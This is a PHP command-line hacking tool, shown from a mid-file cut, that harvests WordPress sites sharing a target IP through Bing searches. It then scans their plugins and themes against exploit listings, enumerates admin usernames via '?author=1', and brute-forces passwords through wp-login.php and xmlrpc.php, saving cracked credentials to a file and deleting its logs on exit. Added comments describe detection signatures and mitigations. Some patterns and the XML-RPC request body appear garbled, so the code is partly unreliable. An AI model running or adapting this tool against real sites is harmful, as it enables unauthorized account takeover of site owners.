d->results as $value) {
$file = fopen("sites.txt","a+");
fwrite($file,"{$value->DisplayUrl}\n");
fclose($file);
}
}
function wp($list){
########################################
## CHECK IF IS BUILT ON WORDPRESS ##
########################################
# Reads the URL list at $list, fetches every entry over HTTP and appends the
# ones whose response body contains "wp-content" or "wp-includes" to
# wp-sites.txt in the working directory; a second pass then rewrites that file
# with duplicate lines removed. No return value. Input: path to a text file of
# URLs (written by bing_it() in this script). Output artifact: wp-sites.txt.
$file = file_get_contents($list);
$get = explode('\n', $file);
foreach($get as $site){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
# The same fixed, long-obsolete User-Agent literal is sent by every fetch
# routine in this file. On the receiving side that string is a cheap log
# signature for this tool; note also that curl_exec() is issued twice per
# entry, so each site sees two identical back-to-back GETs.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# Fingerprint test: either WordPress asset path anywhere in the body counts.
if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
$filename = 'wp-sites.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $site."\n");
fclose($fp);
}
}
# De-duplicate in place. file() keeps line endings, so implode() needs no glue;
# array_unique() keeps the first occurrence of each line. file() returns false
# (with a warning) if wp-sites.txt does not exist at this point.
$lines = file('wp-sites.txt');
$lines = array_unique($lines);
file_put_contents('wp-sites.txt', implode($lines));
}
function wp_em($list){
###############################
## MAKE'EM CRYSTAL CLEAR ##
###############################
# For every URL in $list: fetch the page, pull a single capture out of the
# body with the pattern below, strip "xmlrpc.php" from it and append the
# result to wp.txt; finally de-duplicate wp.txt in place. No return value.
# Output artifact: wp.txt (consumed by the menu code at the bottom of the file).
$file = file_get_contents($list);
$get = explode("\n", $file);
foreach($get as $wpsite){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wpsite);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# NOTE(review): the pattern on the next line looks extraction-mangled — as
# shown it has no capture group, so $url[1] would be undefined. Left as-is.
preg_match('||', $result, $url);
$wpurl = str_replace("xmlrpc.php","",$url[1]);
$filename = 'wp.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $wpurl."\n");
fclose($fp);
}
# Same in-place de-duplication as wp(): file() keeps line endings, so
# implode() needs no separator.
$lines = file('wp.txt');
$lines = array_unique($lines);
file_put_contents('wp.txt', implode($lines));
}
function xp_scanner($target, $list, $key = NULL){
##########################################################
## PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION ##
##########################################################
## LIST FORMAT: NAME:PATH:KEYWORD ##
## EXAMPLE: xp:wp-content/plugins/xp/xp.php:Group-XP ##
##########################################################
## NAME IS REQUIRED (*) ##
## PATH IS REQUIRED (*) ##
## KEYWORD IS OPTIONAL (?) ##
##########################################################
# Probes $target for each NAME:PATH:KEYWORD entry in $list and prints a line
# per hit; nothing is returned and (the "SAVE IT" blocks being commented out)
# nothing is written to disk. $key selects the detection mode: NULL means a
# HEAD-style status check via get_headers(), any other value means a body
# fetch matched against the entry's KEYWORD field.
$file = file_get_contents($list);
$plugins = explode("\n", $file);
#print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
if($key == NULL){
foreach($plugins as $plugin){
#####################
## GET HEADERS ##
#####################
$x = explode(":", $plugin);
$target = $target.'/'.$x[1];
# Errors from get_headers() are suppressed with @; $check is false on failure.
$check = @get_headers($target);
# eregi() is the legacy POSIX regex function (removed in PHP 7.0); the test
# is simply "200" anywhere in the status line.
if(eregi("200",$check[0])){
####################
## PLUGIN FOUND ##
####################
print "\n\t[!] FOUND $x[0] -> $target";
/*
#############
## SAVE IT ##
#############
$data = $target." -> ".$x[0]."\n";
$filename = 'vuln.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data);
fclose($fp);
*/
}#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
}
}else{
foreach($plugins as $plugin){
#####################
## GET KEYWORD ##
#####################
$x = explode(":", $plugin);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# The KEYWORD field from the list file is interpolated into the pattern
# without preg_quote(), so regex metacharacters in it change the match.
if(preg_match("#".$x[2]."#", $result)){
####################
## PLUGIN FOUND ##
####################
print "\n\t[!] FOUND $x[0] -> $target";
/*
#############
## SAVE IT ##
#############
$data = $target." -> ".$x[0]."\n";
$filename = 'vuln.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data);
fclose($fp);
*/
} #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
}
}
}
function xp_get_plugins($target){
#########################
## GET ALL PLUGINS ##
#########################
# Fetches $target (following redirects), collects every distinct name that
# appears between "/plugins/" and the next "/" in the HTML, and hands each
# one to xp_scanner_db(). No return value; any disk output happens in
# xp_scanner_db(). The names come straight from the remote page, i.e. they
# are untrusted input to the regex built in xp_scanner_db().
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# Case-insensitive, non-greedy: $plugin[1] holds the path segment after
# "/plugins/"; duplicates are dropped before scanning.
preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
$plugins = array_unique($plugin[1]);
#if(count($plugins)==0){
# print "No Plugin was found.";
#}
foreach($plugins as $found){
#print "\n\n$found\n\n";
#################
## SEARCH IT ##
#################
xp_scanner_db($target, $found);
}
}
function xp_get_themes($target){
#########################
## GET ALL THEMES ##
#########################
# Theme counterpart of xp_get_plugins(): fetches $target (following
# redirects), collects every distinct name between "/wp-content/themes/" and
# the next "/" in the HTML, and passes each to xp_scanner_db(). No return
# value. The request setup is identical to xp_get_plugins(), including the
# fixed User-Agent and the duplicated curl_exec() call.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# $theme[1] holds the captured theme directory names; de-duplicated below.
preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
$themes = array_unique($theme[1]);
#if(count($plugins)==0){
# print "No Plugin was found.";
#}
foreach($themes as $found){
#print "\n\n$found\n\n";
#################
## SEARCH IT ##
#################
xp_scanner_db($target, $found);
}
}
function xp_scanner_db($target, $plugin){
#######################################################################
## PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION ##
#######################################################################
## THIS VERSION ONLY CHECKS ##
## - WORDPRESSEXPLOIT.COM ##
## - EXPLOIT-DB.COM ##
################################
# Downloads the page configured in $wpexploit and, if $plugin occurs in the
# response body, appends one line naming $target and $plugin to vulpl.txt.
# No return value. Despite the banner, only the single URL in $wpexploit is
# consulted in the code below. Output artifact: vulpl.txt.
$wpexploit = array("http://www.wordpressexploit.com/", );
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wpexploit);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# $plugin is scraped from the scanned site's HTML (see xp_get_plugins /
# xp_get_themes) and dropped into the pattern without preg_quote(), so a
# name containing regex metacharacters or "#" alters or breaks the match.
if(preg_match("#$plugin#", $result)){
##############
## GOTCHA ##
##############
//print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
###############
## SAVE IT ##
###############
$data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
$filename = 'vulpl.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
}
}
function xp_get_user($target,$list, $xmlrpc = NULL){
####################################
## GET WORDPRESS USERNAME ##
## A SIMPLE ONE BUT WOTH A SHOT ##
####################################
# Requests "$target/?author=1" (redirects followed), extracts a '|'-separated
# field from the response with the pattern below, and passes its first part
# as the user name to xp_brute() ($xmlrpc NULL) or xp_brute_xmlrpc()
# (otherwise). Returns whatever the chosen routine returns.
# Defender note: this relies on WordPress author-ID archive behaviour;
# sites that block or rewrite "?author=N" requests, and WAF rules that
# alert on them, break this step and give an early detection point.
$user = trim(($target))."/?author=1";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $user);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
# NOTE(review): the two-line pattern below appears extraction-mangled
# (delimiters survive, the markup they bracketed does not). Left as-is.
preg_match('#
(.*?)#', $result, $username);
$account = explode('|', $username[1]);
if($xmlrpc == NULL){
###########################################################
## START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
###########################################################
return xp_brute($target,$account[0],$list);
}else {
###########################################################
## START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT ##
###########################################################
return xp_brute_xmlrpc($target,$account[0],$list);
}
}
function xp_brute($target,$user,$list){
###########################################
## BRUTE FORCE PULBLIC/FIRST VERSION ##
###########################################
## PASSWORDS LIST FORMAT: PASSWORD\n ##
## EXAMPLE: 12345\np4ssw0rd ##
## ( \n = NEW LINE ) ##
###########################################
# Password-guessing loop against "$target/wp-login.php": one POST per line
# of $list, stopping at the first response whose body contains
# 'tab-panel-overview'. A hit is printed and appended to cracked.txt.
# No return value. Host-side artifacts: cracked.txt and the cookie jar
# "<cwd>./wp-cookie.txt", which no code in this file ever deletes.
# Defender note: the traffic is a burst of POSTs to wp-login.php from one
# source, each with the fixed User-Agent below and "rememberme=forever" in
# the form body; login rate limiting, lockout and MFA on wp-login.php are
# the standard mitigations, and the UA/form signature is easy to alert on.
$file = file_get_contents($list);
$passwords = explode("\n", $file);
$target = trim($target);
$user = trim($user);
print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
foreach($passwords as $password){
#############################
## TESTING EACH PASSWORD ##
#############################
$redirect = $taregt."/wp-admin/";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
# 10 s transfer and connect time-outs bound each attempt.
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
# Cookie jar/file path is getcwd() with "./wp-cookie.txt" appended verbatim.
curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
# The whole "Log+In&redirect_to=...&testcookie=1" tail is url-encoded as one
# value of wp-submit; $user and $password are concatenated raw.
$urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
$result = curl_exec($curl);
curl_close($curl);
##########################
## CHECK IF IT WORKED ##
##########################
# Success heuristic: a dashboard-only markup fragment in the followed response.
if(strstr($result, 'tab-panel-overview')){
print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
###############
## SAVE IT ##
###############
$data = "\n[!] Cracked $target -> [ $user:$password ]";
$filename = 'cracked.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
break;
}#else{ print "\n[+] Trying $user:$password"; }
}
}
function xp_check_xmlrpc($target){
# Returns 1 if the first header line returned for "$target/xmlrpc.php"
# contains "200", else 0. get_headers() errors are suppressed with @, so an
# unreachable host yields $check === false and the function returns 0.
# eregi() is the legacy POSIX regex function (removed in PHP 7.0).
$target = $target."/xmlrpc.php";
$check = @get_headers($target);
if(eregi("200",$check[0])){
return 1;
}else{
return 0;
}
}
function xp_brute_xmlrpc($target,$user,$list){
######################################################
## BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION ##
######################################################
## PASSWORDS LIST FORMAT: PASSWORD\n ##
## EXAMPLE: 12345\np4ssw0rd ##
## ( \n = NEW LINE ) ##
######################################################
# XML-RPC variant of xp_brute(): after xp_check_xmlrpc() confirms the
# endpoint, one POST per password line is sent to "$target/xmlrpc.php"
# carrying a wp.getUsersBlogs call; the first response containing 'isAdmin'
# is treated as a valid login, printed and appended to cracked.txt.
# No return value. Host-side artifacts: cracked.txt and "<cwd>./wp-cookie.txt".
# Defender note: this is why many hardening guides disable or restrict
# xmlrpc.php; a stream of POSTs to it with the fixed User-Agent below is
# the observable, and rate limiting on xmlrpc.php applies as for wp-login.php.
$target = trim($target);
$user = trim($user);
if(xp_check_xmlrpc($target) != 1){
print "\n[!] Couldn't find xmlrpc.php in $target\n";
break;
}else{
$file = file_get_contents($list);
$passwords = explode("\n", $file);
print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
foreach($passwords as $password){
$password = trim($password);
$headers = array('Content-Type: application/x-www-form-urlencoded');
$isadmin = 'isAdmin';
#############################
## TESTING EACH PASSWORD ##
#############################
# NOTE(review): the request body below reads as a bare method name and two
# values; the XML markup that would normally wrap them is not present in
# this copy, which looks like extraction loss. Left as-is.
$data = "
wp.getUsersBlogs
$user
$password
";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
$result = curl_exec($curl);
curl_close($curl);
##########################
## CHECK IF IT WORKED ##
##########################
# Success heuristic: the 'isAdmin' field only appears in a successful
# wp.getUsersBlogs reply.
if(strstr($result, $isadmin)){
print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
###############
## SAVE IT ##
###############
$data = "\n[!] Cracked $target -> [ $user:$password ]";
$filename = 'cracked.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
break;
}#else{ print "\n[+] Trying $user:$password"; }
}
}
}
function bye(){
########################
## DONE/SAY GOODBYE ##
########################
# Prints the exit banner, removes the working files listed below and
# terminates the process with exit status 2. Never returns.
# Forensic note: vulpl.txt (written by xp_scanner_db) and wp-cookie.txt
# (written by the brute routines) are NOT removed here, so they survive a
# normal exit; the five files below are unlinked without error suppression,
# so a missing one produces a warning.
print "\n\n[+] DONE!\n[-] EXITING.\n\n";
######################
## DELETE LOG FILES ##
###################################################################
## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
###################################################################
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
exit(2);
}
############################
## COMMAND LINE'S SHIT ##
############################
# Script entry point. Flow: clear screen and show notices (clear(),
# noblackhat(), banner() are defined outside this chunk), refuse to run
# unless the SAPI is "cli", prompt for a target address and optional search
# dork, rebuild the six working files in the current directory, collect
# candidate sites via bing_it() (defined above; its tail is visible at the
# top of this chunk and writes sites.txt), filter them with wp()/wp_em(),
# then dispatch on a 1-4 menu choice. Every branch ends in bye(), which
# deletes most working files and exits.
clear();
noblackhat();
################################################
## MAKE SURE IT RUNS ONLY FROM COMMAND LINE ##
################################################
if( strtolower(php_sapi_name()) != 'cli' ) {
printf("%s\n", "Please run only from command line interface.");
exit;
}
clear();
banner();
print "\nIP-Address # ";
$target = trim(fgets(STDIN));
# The IP validation below is commented out, so $target is used unvalidated
# in the search strings passed to bing_it().
// if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
##############################
## DELETE OLD LOG FILES ##
##############################
# unlink() without @ — each missing file produces a warning on first run.
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
unlink('vulpl.txt');
#############################
## CREAT THE LOG FILES ##
#############################
# Truncate/create the working files; these six names are the on-disk
# artifacts this script leaves in its working directory.
$log1 = fopen("sites.txt","w");fclose($log1);
$log2 = fopen("wp-sites.txt","w");fclose($log2);
$log3 = fopen("wp.txt","w");fclose($log3);
$log4 = fopen("vuln.txt","w");fclose($log4);
$log4 = fopen("cracked.txt","w");fclose($log4);
$log5 = fopen("vulpl.txt","w");fclose($log5);
###############################
## SHIT IS GETTIN' REAL =P ##
###############################
print "\nDORK [or simply leave it empty] # ";
$dork = trim(fgets(STDIN));
print "\n[+] Getting the server's sites";
if($dork == ""){
#########################
## IF DORK WAS EMPTY ##
#########################
# Four fixed "ip:" queries when no dork is given.
bing_it("ip:$target");
bing_it("ip:".$target." /page_id=");
bing_it("ip:".$target." Wordpress");
bing_it("ip:".$target." blog");
}else{
###########################
## USE THE USER'S DORK ##
###########################
bing_it("ip:".$target." ".$dork);
}
#print "\n[-] Got'em";sleep(1);
print "\n[+] Separating the sites";
# sites.txt -> wp-sites.txt -> wp.txt pipeline (see wp() and wp_em()).
wp('sites.txt');
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
wp_em('wp-sites.txt');
#################
## Results ##
#################
print "\n[+] Finished, these are the website/s that I found:\n";
$wplist = file_get_contents('wp.txt');
$get = explode("\n", $wplist);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($get as $hk){
if(!$hk==""){
print "\n\t[!] $hk";
}
}
###########################
## GIVE ME AN OPTION ##
###########################
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
$what = trim(fgets(STDIN));
$choice = array("1","2","3","4");
$yesno = array("y","yes");
# Menu dispatch; anything outside $choice falls through to the end of the
# script and the footer without calling bye().
if(in_array($what, $choice)){
if($what == "1"){
print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
$list = trim(fgets(STDIN));
if(!is_file($list)) {
#######################
## CAN'T LOAD LIST ##
#######################
print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
##############
## EXIT ##
##############
bye();
}
#################
## POOYAA! ##
#################
print "\n[+] Scanning begun";
$file = file_get_contents($list);
$plugins = explode("\n", $file);
print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
$targets = file_get_contents('wp.txt');
$r00t3rz = explode("\n", $targets);
print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
$key = strtolower(trim(fgets(STDIN)));
# "y"/"yes" selects keyword mode in xp_scanner(); anything else selects the
# get_headers() status mode ($key NULL).
if(in_array($key, $yesno)){
$key = "set";
}else{
$key = NULL;
}
foreach($r00t3rz as $z){
if(!$z == ""){
xp_scanner($z, $list, $key);
}
}
/*
#################
## Results ##
#################
print "\n[+] Scanning finished!";
$vul = file_get_contents('vuln.txt');
$able = explode("\n", $vul);
print '[ '.count($able).' Website ]\n';
foreach($able as $gxp){
if(!$gxp==""){
print "\n\t[!] $gxp";
}
}
*/
bye();
} elseif($what == "2") {
print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
#################
## POOYAA! ##
#################
print "\n[+] Scanning begun";
$targets = file_get_contents('wp.txt');
$r00t3rz = explode("\n", $targets);
foreach($r00t3rz as $z){
if(!$z == ""){
xp_get_plugins($z);
xp_get_themes($z);
}
}
#################
## Results ##
#################
# vulpl.txt is the only results file this branch reads; bye() leaves it on disk.
print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
$vulpl = file_get_contents('vulpl.txt');
$getpl = explode("\n", $vulpl);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($getpl as $vul){
if(!$vul==""){
print "\n\t$vul";
}
}
bye();
} elseif($what == "3") {
print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
$list = trim(fgets(STDIN));
if(!is_file($list)) {
#######################
## CAN'T LOAD LIST ##
#######################
print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
##############
## EXIT ##
##############
bye();
}
#################
## POOYAA! ##
#################
print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
$xmlrpc = strtolower(trim(fgets(STDIN)));
# "y"/"yes" routes xp_get_user() to the XML-RPC variant; otherwise NULL.
if(in_array($xmlrpc, $yesno)){
$xml = "set";
}else{
$xml = NULL;
}
print "\n[+] Bruting begun";
$targets = file_get_contents('wp.txt');
$xp = explode("\n", $targets);
foreach($xp as $z){
if(!$z == ""){
xp_get_user($z, $list, $xml);
}
}
bye();
} else {
######################
## OOH KILL'EM =P ##
######################
bye();
}
}
####################################
## © R00T3Rz.COM 2014 - CHEERS! ##
####################################
?>